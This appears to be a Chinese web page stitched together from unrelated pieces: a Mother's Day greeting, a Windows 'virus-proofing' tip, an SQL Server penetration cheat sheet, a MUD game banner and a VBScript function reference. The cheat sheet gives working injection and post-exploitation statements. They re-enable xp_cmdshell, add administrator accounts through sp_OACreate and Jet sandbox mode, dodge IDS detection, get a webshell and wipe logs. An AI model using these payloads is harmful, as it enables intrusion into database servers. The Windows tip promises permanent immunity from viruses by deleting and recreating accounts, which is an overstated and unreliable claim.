妈妈,节日快乐!

儿子不在你身边,您要照顾好自己!

呵呵，如果大家使用的是windows2k 或xp那么教大家一招金蝉脱窍 —— 而且只需要这一招克就能死所有病毒！！

　　如果你是新装的系统（或者是你能确认你的系统当前是无毒的），那就再好不过了，现在就立即就打开：

　　“开始→程序→管理工具→计算机管理→本地用户和组→用户” 吧！首先就是把超级管理员密码更改成十位数以上，然后再建立一个用户，把它的密码也设置成十位以上并且提升为超级管理员。这样做的目的是为了双保险：如果你忘记了其中一个密码，还有使用另一个超管密码登陆来挽回的余地，免得你被拒绝于系统之外；再者就是网上的 黑客无法再通过猜测你系统超管密码的方式远程获得你系统的控制权而进行破坏。接着再添加两个用户，比如用户名分别为：user1、user2；并且指定他们属于user组，好了，准备工作到这里就全部完成了，以后你除了必要的维护计算机外就不要使用超级管 理员和user2登陆了。只使用user1登陆就可以了。

　　登陆之后上网的时候找到ie，并为它建立一个快捷方式到桌面上，右键单击快捷方式，选择“以其他用户方式运行”点确定！要上网的时候就点这个快捷方式，它会跟你要用户名和密码这时候你就输入user2的用户名和密码！！！

　　好了，现在你可以使用这个打开的窗 口去上网了，可以随你便去放心的浏览任何恶毒的、恶意的、网站跟网页，而不必再担心中招了！因为你当前的系统活动的用户时user1。而user2是不活动的用户，我们使用这个不活动的用户去上网时，无论多聪明的网站，通过ie得到的信息都将让它都将以为 这个user2就是你当前活动的用户，如果它要在你浏览时用恶意代码对你的系统搞搞破坏的话根本就时行不通的，即使能行通，那么被修改掉的仅仅时use2的一个配置文件罢了，而很多恶意代码和病毒试图通过user2进行的破坏活动却都将失败，因为user 2根本就没运行，怎么能取得系统的操作权呢？？既然取不得，也就对你无可奈何了。而他们更不可能跨越用户来操作，因为微软得配置本来就是各各用户之间是独立的，就象别人不可能跑到我家占据我睡觉用的床一样，它们无法占据user1的位置！所以你只要能保证 总是以这个user2用户做代理来上网（但却不要使用user2来登陆系统，因为如果那样的话，如果user2以前中过什么网页病毒，那么在user2登陆的同时，他们极有可能被激活！），那么无论你中多少网页病毒，全部都将是无法运行或被你当前的use r1用户加载的，所以你当前的系统将永远无毒！

　　不过总有疏忽的时候，一个不小心中毒了怎么办？？

　　不用担心，现在我们就可以来尽情的表演脱壳的技术了！

　　开始金蝉脱壳：

　　重新启动计算机，使用超级管理员登陆——进入系统后什么程序都不要运行你会惊奇的发现在的系统竟然表现的完全无毒！！，那就再好不过了，现在就立即就打开：

　　“开始→程序→管理工具→计算机管理→本地用户和组→用户” 吧！把里面的user1和user2两个用户权删掉吧，你只需要这么轻轻的一删就可以了，那么以前随着这两个用户而存在的病毒也就跟随着这两个用户的消失而一起去长眠了——（好象是陪葬，呵呵！）。这么做过之后我保证你的win2k就象新装的一个样，任何系统 文件和系统进程里都完全是没有病毒的！

　　好！现在再重复开始的步骤从新建立user1和user2两个用户，让他们复活吧。他们复活是复活了，但是曾跟随了他们的病毒却是没这机会了，因为win2k重新建立用户的时候会重新分配给他们全新的配置，而这个配置是全新的也是不可能包含病毒的！！！建 立完成之后立即注销超级管理员，转如使用user1登陆，继续你象做的事吧，你会发现你的系统如同全新了！以上方法可以周而复始的用，再加上经常的去打微软的补丁，几乎可以永远保证你的操作系统是无毒状态！只要你能遵循以下几条规辙：

　　一、任何时间都不以超级管理员的身份登陆系统——除非你要进行系统级更新和维护、需要使用超级管理员身份的时候或是你需要添加和删除用户的时候。

　　二、必须使用超级管理员登陆的时候，保证不使用和运行任何除了操作系统自带的工具和程序之外的任何东西，而且所有维护都只通过开始菜单里的选项来完成，甚至连使用资源管理器去浏览硬盘都不！ 只做做用户和系统的管理和维护就立即退出，而决不多做逗留！（这也是微软的要求，微软最了解自己的东东，他的建议是正确的。浏览硬盘的事，在其他用户身份下你有大把的机会，在超级管理员的身份下还是不要了！！这应该事能完全作到的）。

　　上面的都作到了，那么排除了硬件和误操作原因、、病毒跟系统瘫痪都将与你无缘了。。。。。。。

看过笔者文章的读者可能知道，笔者在渗透的时候最喜欢使用一些存储过程有些都是已知的，但是很多人并不常用，强大的SQL存储过程带来的安全危险是不能忽视的，这里我把笔者整理的一些常用的SQL语句以及存储过程共享出来，希望能引起注意。

     首先说一下如果我们手中有SA权限那么我们该怎么做呢？ 很多朋友就会想到了执行DOS命令加一个管理员权限的用户 用SQL执行的语句就是

     exec master.dbo.xp_cmdshell ’net user xx xx/add’ 但是很多时候我们在使用工具的时候并不能成功的加用户，

     原因可能有以下几个：

     1.xp_cmdshell 被删除
     2.xp_cmdshell所使用的xplog70.dll被删除

     那么如果是第一中情况的话就很简单了，我们只需要恢复存储过程就可以了。恢复存储过程的语句如下：

     ★
     use master
     exec sp_addextendedproc xp_cmdshell,’xp_cmdshell.dll’
     exec sp_addextendedproc xp_dirtree,’xpstar.dll’
     exec sp_addextendedproc xp_enumgroups,’xplog70.dll’
     exec sp_addextendedproc xp_fixeddrives,’xpstar.dll’
     exec sp_addextendedproc xp_loginconfig,’xplog70.dll’
     exec sp_addextendedproc xp_enumerrorlogs,’xpstar.dll’
     exec sp_addextendedproc xp_getfiledetails,’xpstar.dll’
     exec sp_addextendedproc sp_OACreate,’odsole70.dll’
     exec sp_addextendedproc sp_OADestroy,’odsole70.dll’
     exec sp_addextendedproc sp_OAGetErrorInfo,’odsole70.dll’
     exec sp_addextendedproc sp_OAGetProperty,’odsole70.dll’
     exec sp_addextendedproc sp_OAMethod,’odsole70.dll’
     exec sp_addextendedproc sp_OASetProperty,’odsole70.dll’
     exec sp_addextendedproc sp_OAStop,’odsole70.dll’
     exec sp_addextendedproc xp_regaddmultistring,’xpstar.dll’
     exec sp_addextendedproc xp_regdeletekey,’xpstar.dll’
     exec sp_addextendedproc xp_regdeletevalue,’xpstar.dll’
     exec sp_addextendedproc xp_regenumvalues,’xpstar.dll’
     exec sp_addextendedproc xp_regread,’xpstar.dll’
     exec sp_addextendedproc xp_regremovemultistring,’xpstar.dll’
     exec sp_addextendedproc xp_regwrite,’xpstar.dll’
     ★

     以上语句就是恢复存储过程需要的语句了，我们只需要执行以上语句就可以成功恢复存储过程，继续执行我们想要的语句，另外我再告诉大家xp_cmdshell新的恢复办法。

     扩展储存过程被删除以后可以有很简单的办法恢复：
     删除
     drop procedure sp_addextendedproc
     drop procedure sp_oacreate
     exec sp_dropextendedproc ’xp_cmdshell’

     恢复
     dbcc addextendedproc ("sp_oacreate","odsole70.dll")
     dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

     这样可以直接恢复，不用去管sp_addextendedproc是不是存在

     那么我们继续来解决第二个问题， 如果是DLL被删了该怎么办呢？ 很多朋友说再传一个上去就好了，可是笔者还是感觉那样很麻烦可以执行系统命令的存储过程可还有一个，那就是SP_OAcreate ，语句是：
     ★
     DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ’C:\WINdows\system32\cmd.exe /c net user iisloger hook /add’
     ★
     上面的语句就是添加一个用户名为iisloger密码为hook的用户。但是我们要注意了，使用 SP_OAcreate是需要wscript.shell来支持的。如果wscript.shell被删除的话就是不能执行成功了。

     另外在SA权限的时候我们还有一种方法可以执行系统命令，那就是我们常说的沙盒模式
     代码如下：
     ★
     EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SoftWare\Microsoft\Jet\4.0     \Engine’,’SandBoxMode’,’REG_DWORD’,’0’
     意思是修改注册表 开启沙盒

     Select * From OpenRowSet(’Microsoft.Jet.OLEDB.4.0’,’;Database=c:\windows\system32\ias\ias.mdb’,’select shell("net user sadfish fish /add")’);
     利用沙盒模式来添加个管理员
     ★
    因为系统默认的注册表键值是不允许执行沙盒模式命令的，所以需要修改注册表。但是只有SA权限才有权利修改注册表，所以在以上两种方法都不可以用的时候就可以考虑沙盒模式

    至于DB权限我就不用多说了，列目录寻找WEB目录从而进行备份就可以拿到WEBSHELL了，进而再进行提权。

    下面我在列出一些笔者常用的语句给大家参考

    检测 xp_cmdshell (CMD命令)|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')

    检测 xp_regread (注册表读取功能)|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')

    检测 sp_makewebtask (备份功能)|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')

    检测 sp_addextendedproc|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')

    检测 xp_subdirs 读子目录|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')

    检测 xp_dirtree 读子目录|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')

    检测 SP_OAcreate (执行命令)|
    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')

    执行CMD命令 SP_OAcreate
    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add'

    sp_OACreate：
    运行CMD并显示回显的要求是Wscript.shell和Scripting.FileSystemObject可用   //要记住这点，如果服务器over了，wscript.shell那么这存储过程也没多大的用了在注入方面。

    建目录 SP_OAcreate|
    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'

    创建一个虚拟目录E盘|
    ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"'

    设置虚拟目录为可读 e |
    ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

启动 server 服务|
    ;exec master..xp_servicecontrol 'start', 'server' 当然你也可以启动其它服务

    绕过IDS的检测的 xp_cmdshell|
    ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

    开启远程数据库1|
    ; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

    开启远程数据库2|
    ;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

    添加mssql和系统的帐户
    ;exec master.dbo.sp_addlogin username;--

    ;exec master.dbo.sp_password null,password,username;--

    ;exec master.dbo.sp_addsrvrolemember sysadmin username;--

    ;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--

    ;exec master.dbo.xp_cmdshell 'net user username password /add';--

    ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

    遍历目录 /不一定用来遍历目录，你也可以把xp_cmdshell执行的结果，插入表中

    ;create table dirs(paths varchar(100), id int)  
    ;insert dirs exec master.dbo.xp_dirtree 'c:\'  
    ;and (select top 1 paths from dirs)>0
    ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

    遍历目录
    ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
    ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
    ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
    ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
    ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

    删除日志：
    DUMP TRANSACTION sdfsdfsdf WITH NO_LOG

为什么喜欢MUD，其实个人感觉MUD远比所有的2D，3D游戏还要出色，
懂得MUD内涵的人，或许说喜欢编程的人，应该都会喜欢！

IP   61.131.96.76
端口 4000

★请大家使用域名 mud.xajh2.cn 不要用 IP，因为 IP 可能会随时变更。

                    笑 傲 江 湖 Ⅱ

            - MudOS v22.1b22, XAJH mudlib 2.0b -

         笑傲江湖家页: < http://www.xajh2.cn >
         笑傲江湖论坛: < http://bbs.xajh2.cn >
         笑傲江湖QQ群: < 5933480 >

★初次试运行: 1998 年 5 月

★笑傲江湖游戏端口：4000| 4001| 4002| 4003| 4004|
                     
★请大家尝试多个端口登陆，以免发生拥挤情况！

★请大家使用域名 mud.xajh2.cn 不要用 IP，因为 IP 可能会随时变更。

自一九九八年七月十七日起，共有一千零十七万三千二百六十七人次来访。
笑傲江湖Ⅱ已经执行了十四天一小时十三分二十六秒

您的 IP 地址是：121.10.145.111, 此地址目前共有 1 个玩家在线。
目前共有 0 位巫师、215 位玩家在线上，以及 0 位使用者尝试连线中。

您的英文名字：

　　函数，就是该语言封装了的一个功能块，以方便用户的调用。比如“now()”在VBScript中就是一个能显示出当前日期和时间的函数。至于具体为什么能显示，则是该语言内核所定的，用户只需明白“now()”就是用来能显示日期时间的。那么，我们当前接触的VBScript还有其他什么功能的函数么?

　　1，日期/时间函数

　　这些函数包括对“年”、“月”、“日”、“时”、“分”、“秒”、“星期”等的显示。

　　(1)Now函数:根据计算机系统设定的日期和时间，返回当前的日期和时间值。使用方法now();

　　(2)Date函数:只返回当前计算机系统设定的日期值。使用方法:date();

　　(3)Time函数:只返回当前计算机系统设定的时间值。使用方法:time();

　　(4)Year函数:返回一个代表某年的整数。使用方法:year(date)，其中date参数是任意的可以代表日期的参数，比如“year(date())”就表示是从“date()”得出的日期中提取其中“年”的整数。

　　另外，还可以这样应用:“year(#5 20,2006#)”表示提取“2006年5月20日”中“年”的整数值。关于“5 20,2006”，也可使用“5-20-2006”、“5/20/2006”等形式表现，即“某月某日”和“某年”的组合。同时注意使用“#”进行包括以表示日期值。

　　(5)Month函数:返回1到12之间的整数值，表示一年中某月。使用方法:month(date)。关于参数date的说明和year函数相同。但要注意日期的正确性，比如“#13-31-2006#”，根本就没有“13”月，肯定是错误的了。

　　(6)Day函数:返回1到31之间的整数值，表示一个月中的某天。使用方法:day(date)。关于参数date的说明和year函数相同。同样要注意日期的正确性，比如“#2-30-2006#”其中对“2”月定义的“30”日这天就是错误的。

　　(7)Hour函数:返回0到23之间的整数值，表示一天中的某个小时。使用方法:hour(time)。其中参数time是任意的可代表时间的表达式。比如“hour(time())”就表示是从“time()”得出的时间中提取其中“小时”的整数。同样，参数time还可以这样应用“hour(#11:45:50#)”表示从“11”时“45”分“50”秒中提取当前小时数。当然，定义的时间要符合时间的规范。

　　(8)Minute函数:返回0到59之间的整数值，表示一小时中的某分钟。使用方法:minute(time)。time参数的说明和hour函数相同。

　　(9)Second函数:返回0到59之间的整数值，表示一分钟中的某秒。使用方法:second(time)。time参数的说明和hour函数相同。

　　(10)Weekday函数:返回一个星期中某天的整数。使用方法:weekday(date)。关于参数date的说明和year函数相同。该函数返回值为“1”到“7”，分别代表“星期日”、“星期一”……“星期六”。比如当返回值是“4”时就表示“星期三”。

　　(11)WeekDayName函数:返回一个星期中具体某天的字符串。相对weekday函数而言即翻译出“星期几”，使用方法:weekdayname(weekday)。参数weekday即星期中具体某天的数值。比如“weekdayname(weekday(date()))”就表示当前是“星期几”。因为“date()”表示的是当前的时间，而“weekday(date())”就表示的是一星期中具体某天的整数。

　　当然weekdayname函数最终显示的字符串内容还与当前操作系统语系有关，比如中文操作系统将显示“星期一”这类的中文字符，而英文操作系统则显示为“Mon”(Monday简写)。

　　此外，在VBScript中还有一些关于时间间隔的计算函数:

　　(1)DateAdd函数:返回指定时间间隔的日期、时间。可以计算出相隔多少年、或相隔几个月、又或相隔几个小时等的新日期、时间。使用方法:dateadd(interval, number, date)。

　　其中参数interval表示需要添加的时间间隔单位。其是以字符串的形式表达的，比如“yyyy”表示年，“q”表示季度，“m”表示月份，“d”表示天数，“ww”表示周数，“h”表示小时数，“n”表示分钟数，“s”表示秒数。

　　而参数number则表示添加的时间间隔数。其是以数值的形式表达的，可以为负值。参数date则要求是日期、时间的正确格式。

　　比如dateadd("d",100,"2006-5-20")就表示2006年5月20号以后的100天的日期值:2006-8-28。再比如dateadd("h",-12,"2005-5-20 10:00:00")就表示2005年5月20号上午10点前的12小时的日期时间:2005-5-19 22:00:00。

　　(2)DateDiff函数:返回两个日期时间之间的间隔。可计算出两个日期相隔的年代、小时数等。使用方法:datediff(interval,date1,date2)。

　　参数interval和dateadd函数中的interval参数内容描述相同，date1和date2参数分别就是相互比较的两个日期时间。另外，当date1的日期时间值大于date2时，将显示为负值。

　　比如DateDiff("yyyy","1982-7-18",date)表示某人的出生到现在已经多少年了。又比如DateDiff("d","1982-7-18","2062-7-18")则计算了80年过了多少天:29220。

　　2，字符串处理函数

　　在脚本的功能处理中，通常需要对一些字符串进行一些修饰性处理。比如过滤掉字符串中的敏感字眼以符合最终显示的要求;又比如一段较长的字符串，需要提取开头的几个字符时。

　　(1)Asc函数:返回字符串中第一个字母对应的ANSI字符代码。使用方法:asc(string)。其中string参数表示字符串。

　　(2)Chr函数:返回指定了ANSI 字符代码对应的字符。使用方法:chr(chrcode)。参数chrcode是相关的标识数字。该函数的功能和asc函数形成对应。

　　比如:asc(“a”)表示小写字母“a”的ANSI 字符“97”;同样chr(97)表示的就是“小写字母a”。另外chr(chrcode)中参数chrcode值为0到31的数字时，表示不可打印的ASCII码。比如“chr(10)”表示换行符，“chr(13)”表示回车符等，这常用于输入和显示格式的转换中。

　　(3)Len函数:返回字符串内字符的数目(字节数)。使用方法:len(string)。比如len(“love”)的值就是4。

　　(4)LCase函数:返回所有字符串的小写形式。使用方法:lcase(string)。比如lcase(“CNBruce”)返回为“cnbruce”。

　　(5)UCase函数:返回所有字符串的大写形式。与lcase函数形成对应。同样，ucase(“CNBruce”)返回为“CNBRUCE”。

　　(6)Trim函数、LTrim函数和RTrim函数:分别返回前导和后续不带空格、前导不带空格或后续不带空格的字符串内容。比如:

　　trim(“ cnbruce ”)返回为“cnbruce”，前导和后续都不带空格;

　　ltrim(“ cnbruce ”)返回为“cnbruce ”，前导不带空格;

　　rtrim(“ cnbruce ”)返回为“ cnbruce”，后续不带空格;

　　该函数常用于注册信息中，比如确保注册用户名前或后的空格。

　　(7)Left函数:返回从字符串的左边算起的指定数目的字符。使用方法:left(string,length)。比如left(“brousce”,5)返回为“brous”，即前五位字符。

　　(8)Right函数:返回从字符串的左边算起的指定数目的字符。使用方法:right(string,length)。比如right(“brousce”,4)返回为“usce”，即后四位字符。

　　(9)instr函数:返回某字符串在另一字符串中第一次出现的位置。比如现在查找字母“A”在字符串“A110B121C119D1861”中第一次出现的位置，则可以 instr(my_string,"A110B121C119D1861")

　　(10)Mid函数:从字符串中返回指定数目的字符。比如现在的“110”则应该是从字符串“A110B121C119D1861”的第2位取得3个单位的值:mid("A110B121C119D1861",2,3)

　　(11)Replace函数:在字符串中查找、替代指定的字符串。replace(strtobesearched,strsearchfor,strreplacewith)其中strtobesearched是字符串，strsearchfor是被查找的子字符串，strreplacewith是用来替代的子字符串。比如 replace(rscon,"<","<") 则表示将rscon中所有“<”的字符替换为“<”

　　3，类型转换函数

　　Cbool(string) 转换为布尔值

　　Cbyte(string) 转换为字节类型的值

　　Ccur(string) 转换为货币类值

　　Cdate(string) 转换为日前类型的值

　　Cdbl(string) 转换为双精度值

　　Cint(string) 转换为整数值

　　Clng(string) 转换为长整型的值

　　Csng(string) 转换为单精度的值

　　Cstr(var) 转换为字符串值

　　Str(var) 数值转换为字符串

　　Val(string) 字符串转换为数值

　　4，运算函数

　　Abs(nmb) 返回数子的绝对值

　　Atn(nmb) 返回一个数的反正切

　　Cos(nmb) 返回一个角度的余炫值

　　Exp(nmb) 返回自然指数的次方值

　　Int(nmb) 返回数字的整形(进位)部份

　　Fix(nmb) 返回数字的整形(舍去)部份

　　Formatpercent(表达式) 返回百分比

　　Hex(nmb) 返回数据的16进制数

　　Log(nmb) 返回自然对数

　　Oct(nmb) 返回数字的8进制数

　　Rnd 返回大于“0”而小于“1”的随机数，但此前需 randomize 声明产生随机种子

　　Sgn(nmb) 判断一个数字的正负号

　　Sin(nmb) 返回角度的正铉值

　　Sqr(nmb) 返回数字的二次方根

　　Tan(nmb) 返回一个数的正切值

　　5，其他函数

　　IsArray(var) 判断一个变量是否是数组

　　IsDate(var) 判断一个变量是否是日期

　　IsNull(var) 判断一个变量是否为空

　　IsNumeric(var) 判断表达式是否包含数值

　　IsObject(var) 判断一个变量是否是对象

　　TypeName(var) 返回变量的数据类型

　　Array(list) 返回数组

　　Split(liststr) 从一个列表字符串中返回一个一维数组

　　LBound(arrayP 返回数组的最小索引

　　Ubound(array) 返回数组的最大索引

　　CreateObject(class) 创建一个对象

　　GetObject(pathfilename) 得到文件对象